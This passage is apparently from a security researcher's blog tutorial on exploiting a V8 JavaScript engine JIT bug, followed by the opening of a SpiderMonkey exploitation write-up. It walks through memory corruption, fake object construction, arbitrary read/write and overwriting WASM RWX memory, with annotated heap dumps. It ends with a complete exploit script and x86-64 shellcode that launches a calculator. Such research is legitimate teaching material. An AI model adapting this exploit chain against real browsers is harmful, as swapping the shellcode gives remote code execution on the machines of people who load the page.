0x00002e5fddf8b6e8    0x4045000000000000    arr2[1] == 42.0
0x00002e5fddf8b6f0    0x4045000000000000    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x00002e5fddf8b6f8    0x0000290fb3502cf1    MAP_TYPE    arr2 JSArray
0x00002e5fddf8b700    0x00002af7fe680c19    FIXED_ARRAY_TYPE [as]   
0x00002e5fddf8b708    0x00002e5fddf8b6d1    FIXED_DOUBLE_ARRAY_TYPE   

Obviously, both FixedDoubleArray of arr and arr2 are contiguous. At arr[3] we've got arr2's map and at arr[4] we've got arr2's elements length (encoded as an Smi, which is 32 bits even on 64 bit platforms). Please note that we changed a little bit the trigger code :

< let arr = new Array(1.1,1.2,1.3,1.4);
---
> let arr = new Array(1.1,1.2,1.3);

Otherwise we would read/write the map instead, as demonstrates the following dump :

oob index is 4
length is 4
leaked 0x0000057520401451
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x30 ] -----
0x0000108bcf50b6c0    0x0000057520401451    MAP_TYPE    
0x0000108bcf50b6c8    0x0000000400000000    
0x0000108bcf50b6d0    0x3ff199999999999a    arr[0] == 1.1
0x0000108bcf50b6d8    0x3ff3333333333333    arr[1]
0x0000108bcf50b6e0    0x3ff4cccccccccccd    arr[2]
0x0000108bcf50b6e8    0x3ff6666666666666    arr[3] == 1.3
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x0000108bcf50b6f0    0x0000057520401451    MAP_TYPE    arr[4] with OOB index!
0x0000108bcf50b6f8    0x0000000300000000    
0x0000108bcf50b700    0x40450ccccccccccd    
0x0000108bcf50b708    0x4045000000000000    
0x0000108bcf50b710    0x4045000000000000    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000108bcf50b718    0x00001dd08d482cf1    MAP_TYPE    
0x0000108bcf50b720    0x0000057520400c19    FIXED_ARRAY_TYPE   

Step 1 : Corrupting a JSArray and leaking an ArrayBuffer's backing store

The problem with step 0 is that we merely overwrite the FixedDoubleArray's length ... which is pretty useless because it is not the field actually controlling the JSArray’s length the way we expect it, it just gives information about the memory allocated for the fixed array. Actually, the only length we want to corrupt is the one from the JSArray.

Indeed, the length of the JSArray is not necessarily the same as the length of the underlying FixedArray (or FixedDoubleArray). Let's quickly check that.

d8> let a = new Array(0);
undefined
d8> a.push(1);
1
d8> %DebugPrint(a)
DebugPrint: 0xd893a90aed1: [JSArray]
 - map: 0x18bbbe002ca1 <Map(HOLEY_SMI_ELEMENTS)> [FastProperties]
 - prototype: 0x1cf26798fdb1 <JSArray[0]>
 - elements: 0x0d893a90d1c9 <FixedArray[17]> [HOLEY_SMI_ELEMENTS]
 - length: 1
 - properties: 0x367210500c19 <FixedArray[0]> {
    #length: 0x0091daa801a1 <AccessorInfo> (const accessor descriptor)
 }
 - elements: 0x0d893a90d1c9 <FixedArray[17]> {
           0: 1
        1-16: 0x3672105005a9 <the_hole>
 }

In this case, even though the length of the JSArray is 1, the underlying FixedArray as a length of 17, which is just fine! But that is something that you want to keep in mind.

If you want to get an OOB R/W primitive that's the JSArray's length that you want to overwrite. Also if you were to have an out-of-bounds access on such an array, you may want to check that the size of the underlying fixed array is not too big. So, let's tweak a bit our code to target the JSArray's length!

If you look at the memory dump, you may think that having the allocated JSArray before the FixedDoubleArray mightbe convenient, right?

Right now the layout is:

FIXED_DOUBLE_ARRAY_TYPE
FIXED_DOUBLE_ARRAY_TYPE
JS_ARRAY_TYPE

Let's simply change the way we are allocating the second array.

23c23
<   arr2 = new Array(42.1,42.0,42.0);
---
>   arr2 = Array.of(42.1,42.0,42.0);

Now we have the following layout

FIXED_DOUBLE_ARRAY_TYPE
JS_ARRAY_TYPE
FIXED_DOUBLE_ARRAY_TYPE
oob index is 4
length is 3
leaked 0x000009d6e6600c19
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x000032adcd10b6b8    0x000009d6e6601451    MAP_TYPE    
0x000032adcd10b6c0    0x0000000300000000    
0x000032adcd10b6c8    0x3ff199999999999a    arr[0]
0x000032adcd10b6d0    0x3ff3333333333333    arr[1]
0x000032adcd10b6d8    0x3ff4cccccccccccd    arr[2]
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x000032adcd10b6e0    0x000009b41ff82d41    MAP_TYPE map arr[3]  
0x000032adcd10b6e8    0x000009d6e6600c19    FIXED_ARRAY_TYPE properties arr[4]    
0x000032adcd10b6f0    0x000032adcd10b729    FIXED_DOUBLE_ARRAY_TYPE elements    
0x000032adcd10b6f8    0x0000000300000000    

Cool, now we are able to access the JSArray instead of the FixedDoubleArray. However, we're accessing its properties field.

Thanks to the precision loss when transforming +1+1 into +2 we get a difference of 2 between the computations. If we get a difference of 4, we'll be at the right offset. Transforming +1+1+1 into +3 will give us this!

d8> x + 1 + 1 + 1
9007199254740992
d8> x + 3
9007199254740996
26c26
<   z = z + 1 + 1;
---
>   z = z + 1 + 1 + 1;

Now we are able to read/write the JSArray's length.

oob index is 6
length is 3
leaked 0x0000000300000000
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x000004144950b6e0    0x00001b7451b01451    MAP_TYPE    
0x000004144950b6e8    0x0000000300000000    
0x000004144950b6f0    0x3ff199999999999a    // arr[0]
0x000004144950b6f8    0x3ff3333333333333  
0x000004144950b700    0x3ff4cccccccccccd    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x000004144950b708    0x0000285651602d41    MAP_TYPE    
0x000004144950b710    0x00001b7451b00c19    FIXED_ARRAY_TYPE    
0x000004144950b718    0x000004144950b751    FIXED_DOUBLE_ARRAY_TYPE    
0x000004144950b720    0x0000000300000000    // arr[6]

Now to leak the ArrayBuffer's data, it's very easy. Just allocate it right after the second JSArray.

let arr = new Array(MAGIC,MAGIC,MAGIC);
arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
ab = new ArrayBuffer(AB_LENGTH);

This way, we get the following memory layout :

----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00003a4d7608bb48    0x000023fe25c01451    MAP_TYPE    
0x00003a4d7608bb50    0x0000000300000000    
0x00003a4d7608bb58    0x3ff199999999999a    arr[0]
0x00003a4d7608bb60    0x3ff199999999999a    
0x00003a4d7608bb68    0x3ff199999999999a    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x00003a4d7608bb70    0x000034dc44482d41    MAP_TYPE    
0x00003a4d7608bb78    0x000023fe25c00c19    FIXED_ARRAY_TYPE    
0x00003a4d7608bb80    0x00003a4d7608bba9    FIXED_DOUBLE_ARRAY_TYPE    
0x00003a4d7608bb88    0x0000006400000000    
----- [ FIXED_ARRAY_TYPE : 0x18 ] -----
0x00003a4d7608bb90    0x000023fe25c007a9    MAP_TYPE    
0x00003a4d7608bb98    0x0000000100000000    
0x00003a4d7608bba0    0x000023fe25c005a9    ODDBALL_TYPE    
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] -----
0x00003a4d7608bba8    0x000023fe25c01451    MAP_TYPE    
0x00003a4d7608bbb0    0x0000000100000000    
0x00003a4d7608bbb8    0x3ff3333333333333    arr2[0]
----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] -----
0x00003a4d7608bbc0    0x000034dc444821b1    MAP_TYPE    
0x00003a4d7608bbc8    0x000023fe25c00c19    FIXED_ARRAY_TYPE    
0x00003a4d7608bbd0    0x000023fe25c00c19    FIXED_ARRAY_TYPE    
0x00003a4d7608bbd8    0x0000000000000100    
0x00003a4d7608bbe0    0x0000556b8fdaea00    ab's backing_store pointer!
0x00003a4d7608bbe8    0x0000000000000002    
0x00003a4d7608bbf0    0x0000000000000000    
0x00003a4d7608bbf8    0x0000000000000000   

We can simply use the corrupted JSArray (arr2) to read the ArrayBuffer (ab). This will be useful later because memory pointed to by the backing_store is fully controlled by us, as we can put arbitrary data in it, through a data view (like a Uint32Array).

Now that we know a pointer to some fully controlled content, let's go to step 2!

Step 2 : Getting a fake object

Arrays of PACKED_ELEMENTS can contain tagged pointers to JavaScript objects. For those unfamiliar with v8, the elements kind of a JsArray in v8 gives information about the type of elements it is storing. Read this if you want to know more about elements kind.

elements_kind

d8> var objects = new Array(new Object())
d8> %DebugPrint(objects)
DebugPrint: 0xd79e750aee9: [JSArray]
 - elements: 0x0d79e750af19 <FixedArray[1]> {
           0: 0x0d79e750aeb1 <Object map = 0x19c550d80451>
 }
0x19c550d82d91: [Map]
 - elements kind: PACKED_ELEMENTS

Therefore if you can corrupt the content of an array of PACKED_ELEMENTS, you can put in a pointer to a crafted object. This is basically the idea behind the fakeobj primitive. The idea is to simply put the address backing_store+1 in this array (the original pointer is not tagged, v8 expect pointers to JavaScript objects to be tagged). Let's first simply write the value 0x4141414141 in the controlled memory.

Indeed, we know that the very first field of any object is a a pointer to a map (long story short, the map is the object that describes the type of the object. Other engines call it a Shape or a Structure. If you want to know more, just read the previous post on SpiderMonkey or this blog post).

Therefore, if v8 indeed considers our pointer as an object pointer, when trying to use it, we should expect a crash when dereferencing the map.

Achieving this is as easy as allocating an array with an object pointer, looking for the index to the object pointer, and replacing it by the (tagged) pointer to the previously leaked backing_store.

let arr = new Array(MAGIC,MAGIC,MAGIC);
arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
evil_ab = new ArrayBuffer(AB_LENGTH);
packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI);

Quickly check the memory layout.

----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x0000220f2ec82410    0x0000353622a01451    MAP_TYPE    
0x0000220f2ec82418    0x0000000300000000    
0x0000220f2ec82420    0x3ff199999999999a    
0x0000220f2ec82428    0x3ff199999999999a    
0x0000220f2ec82430    0x3ff199999999999a    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000220f2ec82438    0x0000261a44682d41    MAP_TYPE    
0x0000220f2ec82440    0x0000353622a00c19    FIXED_ARRAY_TYPE    
0x0000220f2ec82448    0x0000220f2ec82471    FIXED_DOUBLE_ARRAY_TYPE    
0x0000220f2ec82450    0x0000006400000000    
----- [ FIXED_ARRAY_TYPE : 0x18 ] -----
0x0000220f2ec82458    0x0000353622a007a9    MAP_TYPE    
0x0000220f2ec82460    0x0000000100000000    
0x0000220f2ec82468    0x0000353622a005a9    ODDBALL_TYPE    
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x18 ] -----
0x0000220f2ec82470    0x0000353622a01451    MAP_TYPE    
0x0000220f2ec82478    0x0000000100000000    
0x0000220f2ec82480    0x3ff3333333333333    
----- [ JS_ARRAY_BUFFER_TYPE : 0x40 ] -----
0x0000220f2ec82488    0x0000261a446821b1    MAP_TYPE    
0x0000220f2ec82490    0x0000353622a00c19    FIXED_ARRAY_TYPE    
0x0000220f2ec82498    0x0000353622a00c19    FIXED_ARRAY_TYPE    
0x0000220f2ec824a0    0x0000000000000100    
0x0000220f2ec824a8    0x00005599e4b21f40    
0x0000220f2ec824b0    0x0000000000000002    
0x0000220f2ec824b8    0x0000000000000000    
0x0000220f2ec824c0    0x0000000000000000    
----- [ JS_ARRAY_TYPE : 0x20 ] -----
0x0000220f2ec824c8    0x0000261a44682de1    MAP_TYPE    
0x0000220f2ec824d0    0x0000353622a00c19    FIXED_ARRAY_TYPE    
0x0000220f2ec824d8    0x0000220f2ec824e9    FIXED_ARRAY_TYPE    
0x0000220f2ec824e0    0x0000000300000000    
----- [ FIXED_ARRAY_TYPE : 0x28 ] -----
0x0000220f2ec824e8    0x0000353622a007a9    MAP_TYPE    
0x0000220f2ec824f0    0x0000000300000000    
0x0000220f2ec824f8    0x0000001300000000    // MARK 1 for memory scanning
0x0000220f2ec82500    0x00002f3befd86b81    JS_OBJECT_TYPE    
0x0000220f2ec82508    0x0000003700000000    // MARK 2 for memory scanning

Good, the FixedArray with the pointer to the Math object is located right after the ArrayBuffer. Observe that we put markers so as to scan memory instead of hardcoding offsets (which would be bad if we were to have a different memory layout for whatever reason).

After locating the (oob) index to the object pointer, simply overwrite it and use it.

let view = new BigUint64Array(evil_ab);
view[0] = 0x414141414141n; // initialize the fake object with this value as a map pointer
// ...
arr2[index_to_object_pointer] = tagFloat(fbackingstore_ptr);
packed_elements_array[1].x; // crash on 0x414141414141 because it is used as a map pointer

Et voilà!

Step 3 : Arbitrary read/write primitive

Going from step 2 to step 3 is fairly easy. We just need our ArrayBuffer to contain data that look like an actual object. More specifically, we would like to craft an ArrayBuffer with a controlled backing_store pointer. You can also directly corrupt the existing ArrayBuffer to make it point to arbitrary memory. Your call!

Don't forget to choose a length that is big enough for the data you plan to write (most likely, your shellcode).

let view = new BigUint64Array(evil_ab);
for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) {
  view[i] = f2i(arr2[ab_len_idx-3+i]);
  if (view[i] > 0x10000 && !(view[i] & 1n))
    view[i] = 0x42424242n; // backing_store
}
// [...]
arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr); // object pointer
// [...]
let rw_view = new Uint32Array(packed_elements_array[1]);
rw_view[0] = 0x1337; // *0x42424242 = 0x1337

You should get a crash like this.

$ d8 rw.js 
[+] corrupted JSArray's length
[+] Found backingstore pointer : 0000555c593d9890
Received signal 11 SEGV_MAPERR 000042424242
==== C stack trace ===============================
 [0x555c577b81a4]
 [0x7ffa0331a390]
 [0x555c5711b4ae]
 [0x555c5728c967]
 [0x555c572dc50f]
 [0x555c572dbea5]
 [0x555c572dbc55]
 [0x555c57431254]
 [0x555c572102fc]
 [0x555c57215f66]
 [0x555c576fadeb]
[end of stack trace]

Step 4 : Overwriting WASM RWX memory

Now that's we've got an arbitrary read/write primitive, we simply want to overwrite RWX memory, put a shellcode in it and call it. We'd rather not do any kind of ROP or JIT code reuse(0vercl0k did this for SpiderMonkey).

V8 used to have the JIT'ed code of its JSFunction located in RWX memory. But this is not the case anymore. However, as Andrea Biondo showed on his blog, WASM is still using RWX memory. All you have to do is to instantiate a WASM module and from one of its function, simply find the WASM instance object that contains a pointer to the RWX memory in its field JumpTableStart.

Plan of action: 1. Read the JSFunction's shared function info 2. Get the WASM exported function from the shared function info 3. Get the WASM instance from the exported function 4. Read the JumpTableStart field from the WASM instance

As I mentioned above, I use a modified v8 engine for which I implemented a %DumpObjects feature that prints an annotated memory dump. It allows to very easily understand how to get from a WASM JS function to the JumpTableStart pointer. I put some code here (Use it at your own risks as it might crash sometimes). Also, depending on your current checkout, the code may not be compatible and you will probably need to tweak it.

%DumpObjects will pinpoint the pointer like this:

----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] -----
[...]
0x00002fac7911ec20    0x0000087e7c50a000    JumpTableStart [RWX]

So let's just find the RWX memory from a WASM function.

sample_wasm.js can be found here.

d8> load("sample_wasm.js")
d8> %DumpObjects(global_test,10)
----- [ JS_FUNCTION_TYPE : 0x38 ] -----
0x00002fac7911ed10    0x00001024ebc84191    MAP_TYPE    
0x00002fac7911ed18    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911ed20    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911ed28    0x00002fac7911ecd9    SHARED_FUNCTION_INFO_TYPE    
0x00002fac7911ed30    0x00002fac79101741    NATIVE_CONTEXT_TYPE    
0x00002fac7911ed38    0x00000d1caca00691    FEEDBACK_CELL_TYPE    
0x00002fac7911ed40    0x00002dc28a002001    CODE_TYPE    
----- [ TRANSITION_ARRAY_TYPE : 0x30 ] -----
0x00002fac7911ed48    0x00000cdfc0080b69    MAP_TYPE    
0x00002fac7911ed50    0x0000000400000000    
0x00002fac7911ed58    0x0000000000000000    
function 1() { [native code] }
d8> %DumpObjects(0x00002fac7911ecd9,11)
----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] -----
0x00002fac7911ecd8    0x00000cdfc0080989    MAP_TYPE    
0x00002fac7911ece0    0x00002fac7911ecb1    WASM_EXPORTED_FUNCTION_DATA_TYPE    
0x00002fac7911ece8    0x00000cdfc00842c1    ONE_BYTE_INTERNALIZED_STRING_TYPE    
0x00002fac7911ecf0    0x00000cdfc0082ad1    FEEDBACK_METADATA_TYPE    
0x00002fac7911ecf8    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911ed00    0x000000000000004f    
0x00002fac7911ed08    0x000000000000ff00    
----- [ JS_FUNCTION_TYPE : 0x38 ] -----
0x00002fac7911ed10    0x00001024ebc84191    MAP_TYPE    
0x00002fac7911ed18    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911ed20    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911ed28    0x00002fac7911ecd9    SHARED_FUNCTION_INFO_TYPE    
52417812098265
d8> %DumpObjects(0x00002fac7911ecb1,11)
----- [ WASM_EXPORTED_FUNCTION_DATA_TYPE : 0x28 ] -----
0x00002fac7911ecb0    0x00000cdfc00857a9    MAP_TYPE    
0x00002fac7911ecb8    0x00002dc28a002001    CODE_TYPE    
0x00002fac7911ecc0    0x00002fac7911eb29    WASM_INSTANCE_TYPE    
0x00002fac7911ecc8    0x0000000000000000    
0x00002fac7911ecd0    0x0000000100000000    
----- [ SHARED_FUNCTION_INFO_TYPE : 0x38 ] -----
0x00002fac7911ecd8    0x00000cdfc0080989    MAP_TYPE    
0x00002fac7911ece0    0x00002fac7911ecb1    WASM_EXPORTED_FUNCTION_DATA_TYPE    
0x00002fac7911ece8    0x00000cdfc00842c1    ONE_BYTE_INTERNALIZED_STRING_TYPE    
0x00002fac7911ecf0    0x00000cdfc0082ad1    FEEDBACK_METADATA_TYPE    
0x00002fac7911ecf8    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911ed00    0x000000000000004f    
52417812098225
d8> %DumpObjects(0x00002fac7911eb29,41)
----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] -----
0x00002fac7911eb28    0x00001024ebc89411    MAP_TYPE    
0x00002fac7911eb30    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911eb38    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911eb40    0x00002073d820bac1    WASM_MODULE_TYPE    
0x00002fac7911eb48    0x00002073d820bcf1    JS_OBJECT_TYPE    
0x00002fac7911eb50    0x00002fac79101741    NATIVE_CONTEXT_TYPE    
0x00002fac7911eb58    0x00002fac7911ec59    WASM_MEMORY_TYPE    
0x00002fac7911eb60    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb68    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb70    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb78    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb80    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb88    0x00002073d820bc79    FIXED_ARRAY_TYPE    
0x00002fac7911eb90    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eb98    0x00002073d820bc69    FOREIGN_TYPE    
0x00002fac7911eba0    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911eba8    0x00000cdfc00804c9    ODDBALL_TYPE    
0x00002fac7911ebb0    0x00000cdfc00801d1    ODDBALL_TYPE    
0x00002fac7911ebb8    0x00002dc289f94d21    CODE_TYPE    
0x00002fac7911ebc0    0x0000000000000000    
0x00002fac7911ebc8    0x00007f9f9cf60000    
0x00002fac7911ebd0    0x0000000000010000    
0x00002fac7911ebd8    0x000000000000ffff    
0x00002fac7911ebe0    0x0000556b3a3e0c00    
0x00002fac7911ebe8    0x0000556b3a3ea630    
0x00002fac7911ebf0    0x0000556b3a3ea620    
0x00002fac7911ebf8    0x0000556b3a47c210    
0x00002fac7911ec00    0x0000000000000000    
0x00002fac7911ec08    0x0000556b3a47c230    
0x00002fac7911ec10    0x0000000000000000    
0x00002fac7911ec18    0x0000000000000000    
0x00002fac7911ec20    0x0000087e7c50a000    JumpTableStart [RWX]
0x00002fac7911ec28    0x0000556b3a47c250    
0x00002fac7911ec30    0x0000556b3a47afa0    
0x00002fac7911ec38    0x0000556b3a47afc0    
----- [ TUPLE2_TYPE : 0x18 ] -----
0x00002fac7911ec40    0x00000cdfc00827c9    MAP_TYPE    
0x00002fac7911ec48    0x00002fac7911eb29    WASM_INSTANCE_TYPE    
0x00002fac7911ec50    0x00002073d820b849    JS_FUNCTION_TYPE    
----- [ WASM_MEMORY_TYPE : 0x30 ] -----
0x00002fac7911ec58    0x00001024ebc89e11    MAP_TYPE    
0x00002fac7911ec60    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
0x00002fac7911ec68    0x00000cdfc0080c19    FIXED_ARRAY_TYPE    
52417812097833

That gives us the following offsets:

let WasmOffsets = { 
  shared_function_info : 3,
  wasm_exported_function_data : 1,
  wasm_instance : 2,
  jump_table_start : 31
};

Now simply find the JumpTableStart pointer and modify your crafted ArrayBuffer to overwrite this memory and copy your shellcode in it. Of course, you may want to backup the memory before so as to restore it after!

Full exploit

The full exploit looks like this:

// spawn gnome calculator
let shellcode = [0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x59, 0x49, 0x81, 0xe9, 0x05, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x01, 0x00, 0x00, 0xbf, 0x6b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb1, 0x61, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x20, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0xb8, 0x51, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x49, 0x8d, 0xb9, 0x62, 0x00, 0x00, 0x00, 0xb8, 0xa1, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xb8, 0x3b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb9, 0x64, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x48, 0x89, 0xe6, 0x49, 0x8d, 0x91, 0x7e, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x52, 0x48, 0x89, 0xe2, 0x0f, 0x05, 0xeb, 0xfe, 0x2e, 0x2e, 0x00, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x67, 0x6e, 0x6f, 0x6d, 0x65, 0x2d, 0x63, 0x61, 0x6c, 0x63, 0x75, 0x6c, 0x61, 0x74, 0x6f, 0x72, 0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x3a, 0x30, 0x00];

let WasmOffsets = { 
  shared_function_info : 3,
  wasm_exported_function_data : 1,
  wasm_instance : 2,
  jump_table_start : 31
};

let log = this.print;

let ab = new ArrayBuffer(8);
let fv = new Float64Array(ab);
let dv = new BigUint64Array(ab);

let f2i = (f) => {
  fv[0] = f;
  return dv[0];
}

let i2f = (i) => {
  dv[0] = BigInt(i);
  return fv[0];
}

let tagFloat = (f) => {
  fv[0] = f;
  dv[0] += 1n;
  return fv[0];
}

let hexprintablei = (i) => {
  return (i).toString(16).padStart(16,"0");
}

let assert = (l,r,m) => {
  if (l != r) {
    log(hexprintablei(l) + " != " +  hexprintablei(r));
    log(m);
    throw "failed assert";
  }
  return true;
}

let NEW_LENGTHSMI = 0x64;
let NEW_LENGTH64  = 0x0000006400000000;

let AB_LENGTH = 0x100;

let MARK1SMI = 0x13;
let MARK2SMI = 0x37;
let MARK1 = 0x0000001300000000;
let MARK2 = 0x0000003700000000;

let ARRAYBUFFER_SIZE = 0x40;
let PTR_SIZE = 8;

let opt_me = (x) => {
  let MAGIC = 1.1; // don't move out of scope
  let arr = new Array(MAGIC,MAGIC,MAGIC);
  arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
  evil_ab = new ArrayBuffer(AB_LENGTH);
  packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI, get_pwnd);
  let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
  let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992
  z = z + 1 + 1 + 1;
  z = z - (4503599627370495*2); 

  // may trigger the OOB R/W

  let leak = arr[z];
  arr[z] = i2f(NEW_LENGTH64); // try to corrupt arr2.length

  //  when leak == MAGIC, we are ready to exploit

  if (leak != MAGIC) {

    // [1] we should have corrupted arr2.length, we want to check it

    assert(f2i(leak), 0x0000000100000000, "bad layout for jsarray length corruption");
    assert(arr2.length, NEW_LENGTHSMI);

    log("[+] corrupted JSArray's length");

    // [2] now read evil_ab ArrayBuffer structure to prepare our fake array buffer

    let ab_len_idx = arr2.indexOf(i2f(AB_LENGTH));

    // check if the memory layout is consistent

    assert(ab_len_idx != -1, true, "could not find array buffer");
    assert(Number(f2i(arr2[ab_len_idx + 1])) & 1, false);
    assert(Number(f2i(arr2[ab_len_idx + 1])) > 0x10000, true);
    assert(f2i(arr2[ab_len_idx + 2]), 2);

    let ibackingstore_ptr = f2i(arr2[ab_len_idx + 1]);
    let fbackingstore_ptr = arr2[ab_len_idx + 1];

    // copy the array buffer so as to prepare a good looking fake array buffer

    let view = new BigUint64Array(evil_ab);
    for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) {
      view[i] = f2i(arr2[ab_len_idx-3+i]);
    }

    log("[+] Found backingstore pointer : " + hexprintablei(ibackingstore_ptr));

    // [3] corrupt packed_elements_array to replace the pointer to the Math object
    // by a pointer to our fake object located in our evil_ab array buffer

    let magic_mark_idx = arr2.indexOf(i2f(MARK1));
    assert(magic_mark_idx != -1, true, "could not find object pointer mark");
    assert(f2i(arr2[magic_mark_idx+2]) == MARK2, true);
    arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr);

    // [4] leak wasm function pointer 

    let ftagged_wasm_func_ptr = arr2[magic_mark_idx+3]; // we want to read get_pwnd

    log("[+] wasm function pointer at 0x" + hexprintablei(f2i(ftagged_wasm_func_ptr)));
    view[4] = f2i(ftagged_wasm_func_ptr)-1n;

    // [5] use RW primitive to find WASM RWX memory


    let rw_view = new BigUint64Array(packed_elements_array[1]);
    let shared_function_info = rw_view[WasmOffsets.shared_function_info];
    view[4] = shared_function_info - 1n; // detag pointer

    rw_view = new BigUint64Array(packed_elements_array[1]);
    let wasm_exported_function_data = rw_view[WasmOffsets.wasm_exported_function_data];
    view[4] = wasm_exported_function_data - 1n; // detag

    rw_view = new BigUint64Array(packed_elements_array[1]);
    let wasm_instance = rw_view[WasmOffsets.wasm_instance];
    view[4] = wasm_instance - 1n; // detag

    rw_view = new BigUint64Array(packed_elements_array[1]);
    let jump_table_start = rw_view[WasmOffsets.jump_table_start]; // detag

    assert(jump_table_start > 0x10000n, true);
    assert(jump_table_start & 0xfffn, 0n); // should look like an aligned pointer

    log("[+] found RWX memory at 0x" + jump_table_start.toString(16));

    view[4] = jump_table_start;
    rw_view = new Uint8Array(packed_elements_array[1]);

    // [6] write shellcode in RWX memory

    for (let i = 0; i < shellcode.length; ++i) {
      rw_view[i] = shellcode[i];
    }

    // [7] PWND!

    let res = get_pwnd();

    print(res);

  }
  return leak;
}

(() => {
  assert(this.alert, undefined); // only v8 is supported
  assert(this.version().includes("7.3.0"), true); // only tested on version 7.3.0
  // exploit is the same for both windows and linux, only shellcodes have to be changed 
  // architecture is expected to be 64 bits
})()

// needed for RWX memory

load("wasm.js");

opt_me("");
for (var i = 0; i < 0x10000; ++i) // trigger optimization
  opt_me("");
let res = opt_me("foo");

pwnd

Conclusion

I hope you enjoyed this article and thank you very much for reading :-) If you have any feedback or questions, just contact me on my twitter @__x86.

Special thanks to my friends 0vercl0k and yrp604 for their review!

Kudos to the awesome v8 team. You guys are doing amazing work!

Recommended reading

Introduction to SpiderMonkey exploitation.

Introduction

This blogpost covers the development of three exploits targeting SpiderMonkey JavaScript Shell interpreter and Mozilla Firefox on Windows 10 RS5 64-bit from the perspective of somebody that has never written a browser exploit nor looked closely at any JavaScript engine codebase.

As you have probably noticed, there has been a LOT of interest in exploiting browsers in the past year or two. Every major CTF competition has at least one browser challenge, every month there are at least a write-up or two touching on browser exploitation. It is just everywhere. That is kind of why I figured I should have a little look at what a JavaScript engine is like from inside the guts, and exploit one of them. I have picked Firefox's SpiderMonkey JavaScript engine and the challenge Blazefox that has been written by itszn13.

In this blogpost, I present my findings and the three exploits I have written during this quest. Originally, the challenge was targeting a Linux x64 environment and so naturally I decided to exploit it on Windows x64 :). Now you may wonder why three different exploits? Three different exploits allowed me to take it step by step and not face all the complexity at once. That is usually how I work day to day, I make something small work and iterate to build it up.

Here is how I organized things:

  • The first thing I wrote is a WinDbg JavaScript extension called sm.js that gives me visibility into a bunch of stuff in SpiderMonkey. It is also a good exercise to familiarize yourself with the various ways objects are organized in memory. It is not necessary, but it has been definitely useful when writing the exploits.

  • The first exploit, basic.js, targets a very specific build of the JavaScript interpreter, js.exe. It is full of hardcoded ugly offsets, and would have no chance to land elsewhere than on my system with this specific build of js.exe.

  • The second exploit, kaizen.js, is meant to be a net improvement of basic.js. It still targets the JavaScript interpreter itself, but this time, it resolves dynamically a bunch of things like a big boy. It also uses the baseline JIT to have it generate ROP gadgets.

  • The third exploit, ifrit.js, finally targets the Firefox browser with a little extra. Instead of just leveraging the baseline JIT to generate one or two ROP gadgets, we make it JIT a whole native code payload. No need to ROP, scan for finding Windows API addresses or to create a writable and executable memory region anymore. We just redirect the execution flow to our payload inside the JIT code. This might be the less dull / interesting part for people that knows SpiderMonkey and have been doing browser exploitation already :).

Before starting, for those who do not feel like reading through the whole post: TL;DR I have created a blazefox GitHub repository that you can clone with all the materials. In the repository you can find:

  • sm.js which is the debugger extension mentioned above,
  • The source code of the three exploits in exploits,
  • A 64-bit debug build of the JavaScript shell along with private symbol information in js-asserts.7z, and a release build in js-release.7z,
